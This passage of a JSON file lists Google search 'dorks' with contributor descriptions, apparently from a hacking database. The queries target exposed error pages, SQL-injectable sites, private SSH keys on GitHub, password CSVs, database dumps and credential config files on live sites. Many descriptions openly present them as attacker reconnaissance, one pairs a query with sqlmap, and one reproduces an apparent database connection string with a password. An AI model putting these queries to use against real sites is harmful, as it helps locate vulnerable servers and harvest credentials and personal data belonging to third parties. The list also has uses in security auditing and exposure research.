"\"Error Diagnostic Information\" intitle:\"Error Occurred While\"", "description": "These aren't too horribly bad, but there are SO MANY of them. These sites got googlebotted while the site was having \"technical difficulties.\" The resulting cached error message gives lots of juicy tidbits about the target site."}, {"dork": "\"supplied argument is not a valid MySQL result resource\"", "description": "One of many potential error messages that spew interesting information. The results of this message give you real path names inside the webserver as well as more php scripts for potential \"crawling\" activities."}, {"dork": "\"Chatologica MetaSearch\" \"stack tracking:\"", "description": "There is soo much crap in this error message... Apache version, CGI environment vars, path names, stack-freaking-dumps, process ID's, perl version, yadda yadda yadda..."}, {"dork": "inurl:sitebuildercontent", "description": "This is a default directory for the sitebuilder web design software program. If these people posted web pages with default sitebuilder sirectory names, I wonder what else they got wrong?"}, {"dork": "inurl:sitebuilderfiles", "description": "This is a default directory for the sitebuilder web design software program. If these people posted web pages with default sitebuilder sirectory names, I wonder what else they got wrong?"}, {"dork": "inurl:sitebuilderpictures", "description": "This is a default directory for the sitebuilder web design software program. If these people posted web pages with default sitebuilder sirectory names, I wonder what else they got wrong?"}, {"dork": "intitle:\"the page cannot be found\" \"internet information services\"", "description": "This query finds various types of IIS servers. This error message is fairly indicative of a somewhat unmodified IIS server, meaning it may be easier to break into..."}, {"dork": "intitle:\"500 Internal Server Error\" \"server at\"", "description": "This one shows the type of web server running on the site, and has the ability to show other information depending on how the message is internally formatted."}, {"dork": "\"mySQL error with query\"", "description": "Another error message, this appears when an SQL query bails. This is a generic mySQL message, so there's all sort of information hackers can use, depending on the actual error message..."}, {"dork": "\"You have an error in your SQL syntax near\"", "description": "Another generic SQL message, this message can display path names and partial SQL code, both of which are very helpful for hackers..."}, {"dork": "\"Supplied argument is not a valid MySQL result resource\"", "description": "Another generic SQL message, this message can display path names, function names, filenames and partial SQL code, all of which are very helpful for hackers..."}, {"dork": "\"ORA-00936: missing expression\"", "description": "A generic ORACLE error message, this message can display path names, function names, filenames and partial database code, all of which are very helpful for hackers..."}, {"dork": "\"ORA-00921: unexpected end of SQL command\"", "description": "Another generic SQL message, this message can display path names, function names, filenames and partial SQL code, all of which are very helpful for hackers..."}, {"dork": "\"ORA-00933: SQL command not properly ended\"", "description": "An Oracle error message, this message can display path names, function names, filenames and partial SQL code, all of which are very helpful for hackers..."}, {"dork": "\"Unclosed quotation mark before the character string\"", "description": "An SQL Server error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers..."}, {"dork": "\"Incorrect syntax near\"", "description": "An SQL Server error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers..."}, {"dork": "\"Incorrect syntax near\" -the", "description": "An SQL Server error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers..."}, {"dork": "\"PostgreSQL query failed: ERROR: parser: parse error\"", "description": "An PostgreSQL error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers..."}, {"dork": "\"Supplied argument is not a valid PostgreSQL result\"", "description": "An PostgreSQL error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers..."}, {"dork": "\"Syntax error in query expression \" -the", "description": "An Access error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers..."}, {"dork": "\"An illegal character has been found in the statement\" -\"previous message\"", "description": "An Informix error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers..."}, {"dork": "\"A syntax error has occurred\" filetype:ihtml", "description": "An Informix error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers"}, {"dork": "\"detected an internal error [IBM][CLI Driver][DB2/6000]\"", "description": "A DB2 error message, this message can display path names, function names, filenames, partial code and program state, all of which are very helpful for hackers..."}, {"dork": "An unexpected token \"END-OF-STATEMENT\" was found", "description": "A DB2 error message, this message can display path names, function names, filenames, partial code and program state, all of which are very helpful for hackers..."}, {"dork": "\"Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL\"", "description": "This search reveals Postgresql servers in yet another way then we had seen before. Path information appears in the error message and sometimes database names."}, {"dork": "\"Warning: Cannot modify header information - headers already sent\"", "description": "A PHP error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers..."}, {"dork": "\"access denied for user\" \"using password\"", "description": "Another SQL error message, this message can display the username, database, path names and partial SQL code, all of which are very helpful for hackers..."}, {"dork": "intitle:\"Under construction\" \"does not currently have\"", "description": "This error message can be used to narrow down the operating system and web server version which can be used by hackers to mount a specific attack."}, {"dork": "\"Can't connect to local\" intitle:warning", "description": "Another SQL error message, this message can display database name, path names and partial SQL code, all of which are very helpful for hackers..."}, {"dork": "filetype:asp \"Custom Error Message\" Category Source", "description": "This is an ASP error message that can reveal information such as compiler used, language used, line numbers, program names and partial source code."}, {"dork": "warning \"error on line\" php sablotron", "description": "sablotron is an XML toolit thingie. This query hones in on error messages generated by this toolkit. These error messages reveal all sorts of interesting stuff such as source code snippets, path and filename info, etc."}, {"dork": "intitle:\"Error Occurred\" \"The error occurred in\" filetype:cfm", "description": "This is a typical error message from ColdFusion. A good amount of information is available from an error message like this including lines of source code, full pathnames, SQL query info, database name, SQL state info and local time info."}, {"dork": "intitle:\"Execution of this script not permitted\"", "description": "This is a cgiwrap error message which displays admin name and email, port numbers, path names, and may also include optional information like phone numbers for support personnel."}, {"dork": "\"error found handling the request\" cocoon filetype:xml", "description": "Cocoon is an XML publishing framework. It allows you to define XML documents and transformations to be applied on it, to eventually generate a presentation format of your choice (HTML, PDF, SVG). For more information read http://cocoon.apache.org/2.1/overview.htmlThis Cocoon error displays library functions, cocoon version number, and full and/or relative path names."}, {"dork": "\"Invision Power Board Database Error\"", "description": "These are SQL error messages, ranging from to many connections, access denied to user xxx, showing full path info to the php files etc.. There is an exploitable bug in version 1.1 of this software and the current version is 1.3 available for download on the site."}, {"dork": "intitle:\"Error using Hypernews\" \"Server Software\"", "description": "HyperNews is a cross between the WWW and Usenet News. Readers can browse through the messages written by other people and reply to those messages. This search reveals the server software, server os, server account user:group (unix), and the server administrator email address. Many of these messages also include a traceback of the files and linenumbers and a listing of the cgi ENV variables. An attacker can use this information to prepare an attack either on the platform or the script files."}, {"dork": "intitle:\"Error Occurred While Processing Request\"", "description": "Cold fusion error messages logging the SQL SELECT or INSERT statements and the location of the .cfm file on the webserver.An attacker could use this information to quickly find SQL injection points."}, {"dork": "intitle:\"htsearch error\" ht://Dig error", "description": "The ht://Dig system is a complete world wide web indexing and searching system for a domain or intranet. A list of publically available sites that use ht://Dig is available at http://www.htdig.org/uses.htmlht://Dig 3.1.1 - 3.2 has a directory traversal and file view vulnerability as described at http://www.securityfocus.com/bid/1026. Attackers can read arbitrary files on the system. If the system is not vulnerable, attackers can still use the error produced by this search to gather information such as administrative email, validation of a cgi-bin executable directory, directory structure, location of a search database file and possible naming conventions."}, {"dork": "intext:\"Warning: Failed opening\" \"on line\" \"include_path\"", "description": "These error messages reveal information about the application that created them as well as revealing path names, php file names, line numbers and include paths."}, {"dork": "PHP application warnings failing \"include_path\"", "description": "These error messages reveal information about the application that created them as well as revealing path names, php file names, line numbers and include paths.PS: thanks to fr0zen for correcting the google link for this dork (murfie, 24 jan 2006)."}, {"dork": "\"Internal Server Error\" \"server at\"", "description": "We have a similar search already, but it relies on \"500 Internal Server\" which doesn't appear on all errors like this one. It reveals the server administrator's email address, as well as a nice server banner for Apache servers. As a bonus, the webmaster may have posted this error on a forum which may reveal (parts of) the source code."}, {"dork": "filetype:php inurl:\"logging.php\" \"Discuz\" error", "description": "Discuz! Board error messages related to MySQL. The error message may be empty or contain path information or the offending SQL statement. All discuz! board errors seem to be logged by this php file.An attacker can use this to reveal parts of the database and possibly launch a SQL attack (by filtering this search including SELECT or INSERT statements)."}, {"dork": "\"ORA-12541: TNS:no listener\" intitle:\"error occurred\"", "description": "In many cases, these pages display nice bits of SQL code which can be used by an attacker to mount attacks against the SQL database itself. Other pieces of information revealed include path names, file names, and data sources."}, {"dork": "\"ASP.NET_SessionId\" \"data source=\"", "description": ".NET pages revealing their datasource and sometimes the authentication credentials with it. The complete debug line looks something like this for example:strConn\tSystem.String Provider=sqloledb;Network Library=DBMSSOCN;Data Source=ch-sql-91;Initial Catalog=DBLive;User Id=login-orsearch;Password=0aX(v5~di)>S$+*For quick fun an attacker could modify this search to find those who use Microsoft Access as their storage: It will not suprise the experienced security digger that these files are often in a downloadeble location on the server."}, {"dork": "databasetype. Code : 80004005. Error Description :", "description": "snitz forums uses a microsoft access databases for storage and the default name is \"Snitz_forums_2000.mdb\". The installation recommends changing both the name and the path. If only one is changed this database error occurs. An attacker may use this information as a hint to the location and the changed name for the database, thus rendering the forum vulnerable to hostile downloads."}, {"dork": "intext:\"Error Message : Error loading required libraries.\"", "description": "This throws up pages which contain \"CGI ERROR\" reports - which include the file (and line number) of the errors occurence, the version of Perl being used, detailed server information (of the form \"Apache/1.3.27 (Unix) (Red-Hat/Linux) mod_ssl/2.8.12 OpenSSL/0.9.6b DAV/1.0.3 PHP/4.3.2 mod_perl/1.26\"), usernames, setup file names, form / query information, port and path information, etc.. perfect for system-profiling!"}, {"dork": "intitle:\"404 SC_NOT_FOUND\"", "description": "This error message highlights potentially unpatched or misconfigured Netscape Application Server or iPlanet application servers. An inquisitive mind would probably want to manually alter the URL's returned by this query, just to see what other, more informative messages might be revealed. As these servers are already exhibiting a misconfiguration, this could lead to other vulnerabilities being discovered.Finally, these servers are running software that is a few years old now. An attacker may feel that because of this, there's a strong possibility that they're not patched-up fully either, making them potentially vulnerable to known exploits."}, {"dork": "intitle:\"Default PLESK Page\"", "description": "Plesk Server Administrator (PSA) is web based software that enables remote administration of web servers. It can be used on Linux and other systems that support PHP.The default page is an indication that no configuration has been done (yet) for the domain"}, {"dork": "\"Warning: Supplied argument is not a valid File-Handle resource in\"", "description": "This error message cqan reveal path information. This message (like other error messages) is often posted to help forums, although the message still reveals path info in this form. Consider using the site: operator to narrow search."}, {"dork": "filetype:asp + \"[ODBC SQL\"", "description": "This search returns more than just the one I saw already here. This one will return all ODBC SQL error pages including all data returned in the error. The information can range from simple data such as the table/row queried to full Database name etc.An attacker could take this information and use it to gain a foot hold into the SQL server and could use the information for an SQL injection attack."}, {"dork": "intitle:\"Apache Tomcat\" \"Error Report\"", "description": "Apache Tomcat Error messages. These can reveal various kinds information depending on the type of error."}, {"dork": "\"plugins/wp-db-backup/wp-db-backup.php\"", "description": "Many of the results of the search show error logs which give an attacker the server side paths including the home directory name. This name is often also used for the login to ftp and shell access, which exposes the system to attack. Author: ScOrPiOn"}, {"dork": "inurl:\"index.php?m=content+c=rss+catid=10\"", "description": "Author: eidelweiss http://host/index.php?m=content&c=rss&catid=5\tshow MySQL Error (table)"}, {"dork": "\"CHARACTER_SETS\" \"COLLATION_CHARACTER_SET_APPLICABILITY\"", "description": "\"CHARACTER_SETS\"+\"COLLATION_CHARACTER_SET_APPLICABILITY\"\nfind sql injectable site\ndiscoverd by shinrisama"}, {"dork": "intext:\"Fatal error: Class 'Red_Action' not found in\"", "description": "Dork to find Plugin errors in wordpress websites\nDork - intext:\"Fatal error: Class 'Red_Action' not found in\""}, {"dork": "inurl:advsearch.php?module= & intext:sql syntax", "description": "Exploit Title : SQLI Exploit\nGoogle Dork : inurl:advsearch.php?module= & intext:sql syntax\nDate : 19/3/2013\nExploit Author : Scott Sturrock\nEmail : f00bar'at'linuxmail'dot'org"}, {"dork": "intext:\"Access denied for\" intitle:\"Shopping cart\"", "description": "Here is a Dork I use in conjunction with sqlmap, for shopping carts with\nMySQL\nError messages.\nIt got 80.000 results.\nintext:\"Access denied for\" intitle:\"Shopping cart\""}, {"dork": "intext:\"Unexpected Problem Occurred!\" ext:aspx", "description": "This Error messages reveal a lot of info of servers. Enjoy xD.\nRootkit Pentester."}, {"dork": "intitle:Error-javax.el.ELException+error+xhtml", "description": "An Error Occurred:\n\"javax.el.ELException\" \nJava error and gives \n+ Stack Trace, + Component Tree, + Scoped Variables. \n-Xploit"}, {"dork": "intitle:\"Whoops! There was an error.\"", "description": "These error pages can contain database credentials.\ncontact: @geoffreyvdberge"}, {"dork": "inurl:index.php?id= intext:\"mysql_fetch_array\"", "description": "here's a dork to find sql injectable sites in general.\ninurl can be replaced to something different...\nthx,\nDenis Muhic"}, {"dork": "inurl:/uniquesig0/ or inurl:/uniquesig0/InternalSite/", "description": "Microsoft Forefront Unified Access Gateway - Error Pages/Logins/LogOffMsg's\n-Xploit"}, {"dork": "inurl:/nesp/app", "description": "Novell Access Manager and NetIQ Access Manager \nError:NIDPMAIN (No ESP card defined)\n-Xploit"}, {"dork": "inurl:\"id=\" & intext:\"MySQL Error: 1064\" & \"Session halted.\"", "description": "inurl:\"id=\" & intext:\"MySQL Error: 1064\" & \"Session halted.\"\nProduces about 11,000 results.\nAuthor: pHr0ZZy"}, {"dork": "intitle:\"Struts Problem Report\" intext:\"development mode is enabled.\"", "description": "intitle:\"Struts Problem Report\" intext:\"development mode is\nenabled.\"\nabout 51,600 apache struts apps in dev-mode.\npHr0ZZy"}, {"dork": "intext:\"expects parameter 1 to be resource, boolean given\" filetype:php", "description": "intext:\"expects parameter 1 to be resource, boolean given\" filetype:php\nReturns around 997,000 vulnerable mysql-based websites."}, {"dork": "inurl:index of driver.php?id=", "description": "# Exploit Title: Google dork to discover OS warnings\n# Google Dork:inurl:index of driver.php?id=\n# Exploit Author: @R0d3ntSquad\nSimple dork to reveal websites with a huge amount of errors"}, {"dork": "\"CakeRoutingException\" -site:github.com -site:stackoverflow.com -site:cakephp.org\"", "description": "To find out websites made with CakePHP Framework\r\n\r\n\r\nThanks\r\n\r\nKiran S"}, {"dork": "inurl:?wp-commentsrss2.php -git", "description": "inurl:?wp-commentsrss2.php -git\r\n\r\nThis dork show result that contain wp-commentsrss2.php\r\n\r\nManhNho"}, {"dork": "\"syd_apply.cfm\"", "description": "Find error pages for job applications, sometimes can contain juicy\r\ninformation.\r\n~ CrimsonTorso"}, {"dork": "\"dispatch=debugger.\"", "description": "# Exploit Title: CS-Cart debug and configuration information\r\n# Google Dork:\r\n\r\n\"dispatch=debugger.\"\r\n\r\n# Date: 28, Dec, 2018\r\n# Vendor Homepage:\r\nhttps://www.cs-cart.com/\r\n\r\n# Exploit Author: deadroot"}, {"dork": "inurl:/php-errors.log filetype:log", "description": "inurl:/php-errors.log filetype:log"}, {"dork": "site:com inurl:jboss filetype:log -github.com", "description": "Dork : site:com inurl:jboss filetype:log -github.com\r\n\r\nDescription : this dork gives you jboss error logs.\r\n\r\nAuthor : botsec0"}, {"dork": "filetype:php \"Notice: Undefined variable: data in\" -forum", "description": "Information Disclosure:\r\n\r\nfiletype:php \"Notice: Undefined variable: data in\" -forum"}, {"dork": "site:*/404/404.html intitle:\"404\"", "description": "Error 404 page:\r\n\r\nsite:*/404/404.html intitle:\"404\"\r\nsite:*/503.html intitle:\"503\" intext:\"Service Unavailable\"\r\nsite:*/403.html intitle:\"403 Forbidden\"\r\nsite:*/404.html intitle:\"404 Not Found\"\r\ninurl:\"/index.php/error-404\" intitle:\"Error 404\"\r\nsite:*/index.php/*/error-404 intitle:\"Error 404\"\r\nsite:*/500.* intitle:\"500 Internal Server Error\" intext:\"Internal Server Error\"\r\nintitle:\"IIS 8.0 Detailed Error - 404.0 - Not Found\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/Shibboleth.sso/SAML2/POST", "description": "Error Page:\r\n\r\nsite:*/Shibboleth.sso/SAML2/POST\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/cgi-sys/suspendedpage.cgi intitle:\"Account Suspended\"", "description": "Error Pages:\r\n\r\nsite:*/cgi-sys/suspendedpage.cgi intitle:\"Account Suspended\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/cgi-sys/defaultwebpage.cgi intext:\"SORRY!\"", "description": "Error Pages:\r\n\r\nsite:*/cgi-sys/defaultwebpage.cgi intext:\"SORRY!\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/wp-includes/Requests/php_errorlog", "description": "Error Pages:\r\n\r\nsite:*/wp-includes/Requests/php_errorlog\r\nsite:*/wp-includes/Requests/Hooks.php intext:\"Fatal error:Interface\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/wp-admin/maint/repair.php intext:\"define(WP_ALLOW_REPAIR,true);\"", "description": "Error Pages:\r\n\r\nsite:*/wp-admin/maint/repair.php intext:\"define(WP_ALLOW_REPAIR,true);\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/errors/report.php\" intext:\"There has been an error processing your request\"", "description": "Error Pages:\r\n\r\ninurl:\"/errors/report.php\" intext:\"There has been an error processing your request\"\r\nsite:*/errors/404.html\r\nsite:*/errors/error.html\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:elmah.axd ext:axd", "description": "# Google Dork : inurl:elmah.axd ext:axd\r\n\r\n# Category : Files Containing Juicy Info\r\n\r\n# Date : 11-11-2019\r\n\r\n# Author : Dhaiwat Mehta"}, {"dork": "intitle:\"Error log for /LM/\"", "description": "# Google Dork : intitle:\"Error log for /LM/\"\r\n\r\n# Category : File contains Juicy items\r\n\r\n# Date : 11-11-2019\r\n\r\n# Author : Dhaiwat Mehta"}, {"dork": "intext:\"sf_app\" + \"frontend sf_app_base_cache_dir:\"", "description": "symfony exposed environemnt settings and credentials\r\nnavigate to settings or config\r\n\r\nex16x41"}, {"dork": "intext:\"TCPDFtcpdf.php on line 17778\" -stackoverflow -wordpress -github", "description": "#Author: MiningOmerta\r\n#Google Dork that shows too much server information.\r\n\r\nintext:\"\\TCPDF\\tcpdf.php on line 17778\" -stackoverflow -wordpress -github"}, {"dork": "inurl:(\"/storage/logs/laravel.log\") AND intext:(\"local.ERROR\" | \"NULL.ERROR\" | \"EMERGENCY:\")", "description": "# Dork #\r\n\r\ninurl:(\"/storage/logs/laravel.log\") AND intext:(\"local.ERROR\" |\r\n\"NULL.ERROR\" | \"EMERGENCY:\")\r\n\r\nlaravel Error log."}, {"dork": "inurl:\"/WebResource.axd?d=\" AND intext:Error", "description": "# Dork #\r\n\r\ninurl:\"/WebResource.axd?d=\" AND intext:Error\r\n\r\nError Messages."}, {"dork": "inurl:\"index.php?id=\" intext:\"Warning: mysql_num_rows()\"", "description": "Author:Alperen Ergel\r\nDate: 01/04/2020\r\nDork:inurl:\"index.php?id=\" intext:\"Warning: mysql_num_rows()\"\r\nDescription: potential SQL errors and injection"}, {"dork": "intitle:\"index of\" errors.log", "description": "Dork: intitle:\"index of\" errors.log\r\nDescription: This Google dork lists out errors.log web server files for\r\nwebsites\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"my-errors.log\" OR \"my-errors.logs\"", "description": "# Google Dork: intitle:\"index of\" \"my-errors.log\" OR \"my-errors.logs\"\r\n\r\n# Juicy information including session IDs, user names, and more.\r\n\r\n# Date: 7/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"stacktrace.log\"", "description": "Dork: intitle:\"index of\" \"stacktrace.log\"\r\nDescription: This google dork lists out sensitive stack trace details for\r\nweb servers.\r\nAuthor: Abhi Chitkara"}, {"dork": "intext:\"Error Occurred While Processing Request\"", "description": "# Google Dork: intext:\"Error Occurred While Processing Request\"\r\n\r\n# Error messages.\r\n\r\n# Date: 22/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"Lucee\" \"Error (expression)\" -lucee.org", "description": "# Google Dork: \"Lucee\" \"Error (expression)\" -lucee.org\r\n# Error Messages\r\n# Date:19/07/2021\r\n# Exploit Author: J. Igor Melo"}], "Files Containing Juicy Info": [{"dork": "intitle:\"Ganglia\" \"Cluster Report for\"", "description": "These are server cluster reports, great for info gathering. Lesse, what were those server names again?"}, {"dork": "allinurl:/examples/jsp/snp/snoop.jsp", "description": "These pages reveal information about the server including path information, port information, etc."}, {"dork": "intitle:\"index of\" mysql.conf OR mysql_config", "description": "This file contains port number, version number and path info to MySQL server."}, {"dork": "intitle:\"Big Sister\" +\"OK Attention Trouble\"", "description": "This search reveals Internal network status information about services and hosts."}, {"dork": "inurl:\"/cricket/grapher.cgi\"", "description": "This search reveals information about internal networks, such as configuration, services, bandwidth."}, {"dork": "inurl:\"cacti\" +inurl:\"graph_view.php\" +\"Settings Tree View\" -cvs -RPM", "description": "This search reveals internal network info including architecture, hosts and services available."}, {"dork": "intitle:\"System Statistics\" +\"System and Network Information Center\"", "description": "This search reveals internal network information including network configuratino, ping times, services, and host info."}, {"dork": "BEGIN (CERTIFICATE|DSA|RSA) filetype:key", "description": "This search will find private key files... Private key files are supposed to be, well... private."}, {"dork": "BEGIN (CERTIFICATE|DSA|RSA) filetype:csr", "description": "This search will find private key files... Private key files are supposed to be, well... private."}, {"dork": "\"sets mode: +s\"", "description": "This search reveals secret channels on IRC as revealed by IRC chat logs."}, {"dork": "inurl:email filetype:mdb", "description": "Microsoft Access databases containing email information.."}, {"dork": "data filetype:mdb -site:gov -site:mil", "description": "Microsoft Access databases containing all kinds of 'data'."}, {"dork": "intitle:\"Index Of\" cookies.txt \"size\"", "description": "searches for cookies.txt file. On MANY servers this file holds all cookie information, which may include usernames, passwords, but also gives an attacker some juicy information on this users surfing habits."}, {"dork": "inurl:backup filetype:mdb", "description": "Microsoft Access database backups.."}, {"dork": "inurl:forum filetype:mdb", "description": "Microsoft Access databases containing 'forum' information .."}, {"dork": "intext:(password | passcode) intext:(username | userid | user) filetype:csv", "description": "CSV formatted files containing all sorts of user/password combinations. Results may vary, but are still interesting to the casual attacker.."}, {"dork": "inurl:profiles filetype:mdb", "description": "Microsoft Access databases containing (user) profiles .."}, {"dork": "filetype:fp5 fp5 -site:gov -site:mil -\"cvs log\"", "description": "These are various kinds of FileMaker Pro Databases (*.fp5 applies to both version 5 and 6)."}, {"dork": "filetype:fp3 fp3", "description": "These are FileMaker Pro version 3 Databases."}, {"dork": "filetype:fp7 fp7", "description": "These are Filemaker Pro version 7 databases files."}, {"dork": "mail filetype:csv -site:gov intext:name", "description": "CSV Exported mail (user) names and such."}, {"dork": "filetype:xls -site:gov inurl:contact", "description": "Microsoft Excel sheets containing contact information."}, {"dork": "filetype:xls inurl:\"email.xls\"", "description": "Our forum members never get tired of finding juicy MS office files. Here's one by urban that finds email addresses."}, {"dork": "inurl:\"putty.reg\"", "description": "This registry dump contains putty saved session data. SSH servers the according usernames and proxy configurations are stored here."}, {"dork": "filetype:pst pst -from -to -date", "description": "Finds Outlook PST files which can contain emails, calendaring and address information."}, {"dork": "ext:txt \"Final encryption key\"", "description": "IPSec debug/log data which contains user data and password hashes.Can be used to crack passwords."}, {"dork": "php-addressbook \"This is the addressbook for *\" -warning", "description": "php-addressbook shows user address information without a password."}, {"dork": "intitle:\"Multimon UPS status page\"", "description": "Multimon provide UPS monitoring services"}, {"dork": "filetype:blt \"buddylist\"", "description": "AIM buddylists."}, {"dork": "filetype:ctt Contact", "description": "This is for MSN Contact lists..."}, {"dork": "filetype:ctt \"msn\"", "description": "This will give msn contact lists .. modify the \"msn\" to what ever you feel is messenger related"}, {"dork": "inurl:\"bookmark.htm\"", "description": "Bookmarks for Netscape and various other browsers."}, {"dork": "intitle:\"web server status\" SSH Telnet", "description": "simple port scanners for most common ports"}, {"dork": "ext:DBF DBF", "description": "Dbase DAtabase file. Can contain sensitive data like any other database."}, {"dork": "ext:CDX CDX", "description": "Visual FoxPro database index"}, {"dork": "ext:ccm ccm -catacomb", "description": "Lotus cc:Mail Mailbox file"}, {"dork": "ext:DCA DCA", "description": "IBM DisplayWrite Document Content Architecture Text File"}, {"dork": "allinurl:cdkey.txt", "description": "cdkeys"}, {"dork": "ext:(doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary | intext:\"budget approved\") inurl:confidential", "description": "Although this search is a bit broken (the file extensions don't always work), it reveals interesting-looking documents which may contain potentially confidential information."}, {"dork": "intitle:\"admin panel\" +\"Powered by RedKernel\"", "description": "This finds all versions of RedKernel Referer Tracker(stats page) it just gives out some nice info"}, {"dork": "intitle:\"urchin (5|3|admin)\" ext:cgi", "description": "Gain access to Urchin analysis reports."}, {"dork": "intitle:Bookmarks inurl:bookmarks.html \"Bookmarks", "description": "AFAIK are the bookmarks of Firefox, Netscape and Mozilla stored in bookmarks.html. It is often uploaded to serve as a backup, so it could reveal some juicy information."}, {"dork": "intitle:\"Welcome to F-Secure Policy Manager Server Welcome Page\"", "description": "An attacker may want to know about the antivirus software running. The description says he can check the status of the F-Secure Policy Manager Server's Host Module. He can also check the status of the Console Module, but only if he's reading the page from the local host."}, {"dork": "(intitle:WebStatistica inurl:main.php) | (intitle:\"WebSTATISTICA server\") -inurl:statsoft -inurl:statsoftsa -inurl:statsoftinc.com -edu -software -rob", "description": "WebStatistica provides detailed statistics about a web page. Normally you would have to login to view these statistics but the sites have put autologin on."}, {"dork": "inurl:/cgi-bin/pass.txt", "description": "Passwords"}, {"dork": "intext:ViewCVS inurl:Settings.php", "description": "CVs is a software used to keep track of changes to websites. You can review all updates and previous files wihtout actualy loging into CVS. It is possible to see password files, directory structure, how often is the website updated, previous code find exploits, etc."}, {"dork": "inurl:build.err", "description": "General build error file. Can tell what modules are installed, the OS the compiler the language, in theory usernames and passwords could probably be found too."}, {"dork": "intitle:\"LOGREP - Log file reporting system\" -site:itefix.no", "description": "Logrep is an open source log file Extraction and Reporting System by ITeF!x. This dork finds the logs that it creates."}, {"dork": "intitle:\"AppServ Open Project *\" \"AppServ is a merging open source software installer package\" -phpbb", "description": "Often includes phpinfo and unsecured links to phpmyadmin."}, {"dork": "filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS", "description": "This search locates private SSHHostkeys.\nAuthor: loganWHD"}, {"dork": "\"Cisco PIX Security Appliance Software Version\" + \"Serial Number\" + \"show ver\" -inurl", "description": "Google search for Pix Authorization Keys \nAuthor: fdisk"}, {"dork": "intitle:index.of mt-db-pass.cgi", "description": "These folks had the technical prowess to unpack the movable type files, but couldn't manage to set up their web servers properly. Check the mt.cfg files for interesting stuffs..."}, {"dork": "\"# Dumping data for table\"", "description": "SQL database dumps. LOTS of data in these. So much data, infact, I'm pressed to think of what else an ev1l hax0r would like to know about a target database.. What's that? Usernames and passwords you say? Patience, grasshopper....."}, {"dork": "intitle:\"Index of\" dbconvert.exe chats", "description": "ICQ (http://www.icq.com) allows you to store the contents of your online chats into a file. These folks have their entire ICQ directories online. On purpose?"}, {"dork": "\"cacheserverreport for\" \"This analysis was produced by calamaris\"", "description": "These are squid server cache reports. Fairly benign, really except when you consider using them for evil purposes. For example, an institution stands up a proxy server for their internal users to get to the outside world. Then, the internal user surf all over to their hearts content (including intranet pages cuz well, the admins are stupid) Voila, intranet links show up in the external cache report. Want to make matters worse for yourself as an admin? OK, configure your external proxy server as a trusted internal host. Load up your web browser, set your proxy as their proxy and surf your way into their intranet. Not that I've noticed any examples of this in this google list. *COUGH* *COUGH* *COUGH* unresolved DNS lookups give clues *COUGH* *COUGH* ('scuse me. must be a furball) OK, lets say BEST CASE scenario. Let's say there's not security problems revealed in these logs. Best case scenario is that outsiders can see what your company/agency/workers are surfing."}, {"dork": "filetype: log inurl:\"access.log\" +intext:\"HTTP/1.1\"", "description": "Match some apache access.log files.\nAuthor: susmab"}, {"dork": "intext:db_pass inurl:settings.ini", "description": "Submitter: Bastich mysql.nimbit.com dashboard settings"}, {"dork": "filetype:ini \"Bootstrap.php\" (pass|passwd|password|pwd)", "description": "Zend application ini, with usernames, passwords and db info\nlove\nBastich"}, {"dork": "filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS", "description": "this dork locates registry dumps"}, {"dork": "Google Dork inurl:Curriculum Vitale filetype:doc ( Vital Informaticon , Addres, Telephone Numer, SSN , Full Name, Work , etc ) In Spanish.", "description": "This dork locates Curriculum Vitale files. Author: Luciano UNLP"}, {"dork": "Microsoft-IIS/7.0 intitle:index.of name size", "description": "IIS 7 directory listing. Author: huang"}, {"dork": "intext:\"~~Joomla1.txt\" title:\"Index of /\"", "description": "intext:\"~~Joomla1.txt\" title:\"Index of /\"\nGet all server configs files\nDiscovered by alsa7r"}, {"dork": "?intitle:index.of?\".mysql_history\"", "description": "Find some juicy info in .mysql_history files\nenjoy\nbastich"}, {"dork": "inurl:\"phpmyadmin/index.php\" intext:\"[ Edit ] [ Create PHP Code ] [ Refresh ]\"", "description": "This dork finds unsecured databases"}, {"dork": "filetype:avastlic", "description": "Lots of Avast Licenses .\nAuthor : gr00ve_hack3r\nwww.gr00vehack3r.wordpress.com"}, {"dork": "inurl:admin intext:username= AND email= AND password= OR pass= filetype:xls", "description": "-- \nnitish mehta"}, {"dork": "inurl:\"php?id=\" intext:\"DB_Error Object \"", "description": "Description: Files containing juicy info\nAuthor:ruben_linux"}, {"dork": "\"information_schema\" filetype:sql", "description": "Dork: \"information_schema\" filetype:sql\nBy: Cr4t3r"}, {"dork": "inurl:*/webalizer/* intitle:\"Usage Statistics\"", "description": "*Obrigado,*"}, {"dork": "site:github.com inurl:\"known_hosts\" \"ssh-rsa\"", "description": "Finds SSH known_hosts files on GitHub.\n- Andy G - twitter.com/vxhex"}, {"dork": "site:github.com inurl:\"id_rsa\" -inurl:\"pub\"", "description": "Finds private SSH keys on GitHub.\n- Andy G - twitter.com/vxhex"}, {"dork": "filetype:pdf \"acunetix website audit\" \"alerts summary\"", "description": "Finds reports generated by Acunetix scans.\n- Andy G - twitter.com/vxhex"}, {"dork": "filetype:sql site:gov and \"insert into\"", "description": "filetype:sql site:gov and \"insert into\" \nfind sql files with data on governments sites"}, {"dork": "(intext:mail AND intext:samAccountName) AND (filetype:xlsx OR filetype:xls OR filetype:csv OR filetype:txt)", "description": "Search for samAccountName (an ActiveDirectory attribute). 50/50 success, some usernames disclosed along with other information."}, {"dork": "ext:msg OR ext:eml site:gov OR site:edu", "description": 